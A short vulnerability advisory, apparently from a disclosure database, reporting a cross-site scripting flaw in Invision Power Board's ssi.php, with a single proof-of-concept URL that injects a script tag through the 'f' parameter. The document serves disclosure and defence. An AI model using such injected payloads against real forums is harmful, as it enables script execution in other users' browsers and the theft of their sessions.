Invision Power Board SSI.PHP Cross-Site Scripting Vulnerability

Invision Power Board SSI.PHP Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/hyper/ssi.php?a=out&type=xml&f=<script>alert("ALOooooooooo");</script>